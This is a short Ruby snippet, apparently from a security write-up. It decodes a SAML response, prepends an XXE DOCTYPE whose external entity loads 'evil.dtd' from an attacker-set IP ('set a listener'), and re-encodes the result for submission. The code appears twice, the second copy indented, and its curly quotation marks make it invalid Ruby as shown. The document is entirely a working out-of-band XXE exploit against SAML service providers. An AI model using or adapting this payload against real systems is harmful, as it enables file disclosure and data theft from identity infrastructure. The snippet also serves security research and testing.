mrbrutti/wr_post_sample_2.rb

## wr_post_sample_2.rb
def saml_inject(text, ip)
  text.gsub(
    “<?xml version=\”1.0\” encoding=\”UTF-8\”?>”,
    “<?xml version=\”1.0\” encoding=\”UTF-8\”?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \”http://#{ip}/evil.dtd\"> %remote;]>”
  )
end

def SAML_recode(a)
  CGI.escape(Base64.encode64(a).strip)
end

def SAML_decode(a)
  Base64.decode64(CGI.unescape(a))
end

IP=”1.2.3.4:80" # Replace w/ your IP and set a listener
SAMLResponse = “INSERT_VALID SAMLResponse”
SAML_recode(saml_inject(SAML_decode(SAMLResponse),IP))
	def saml_inject(text, ip)
	text.gsub(
	“<?xml version=\”1.0\” encoding=\”UTF-8\”?>”,
	“<?xml version=\”1.0\” encoding=\”UTF-8\”?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \”http://#{ip}/evil.dtd\"> %remote;]>”
	)
	end

	def SAML_recode(a)
	CGI.escape(Base64.encode64(a).strip)
	end

	def SAML_decode(a)
	Base64.decode64(CGI.unescape(a))
	end

	IP=”1.2.3.4:80" # Replace w/ your IP and set a listener
	SAMLResponse = “INSERT_VALID SAMLResponse”
	SAML_recode(saml_inject(SAML_decode(SAMLResponse),IP))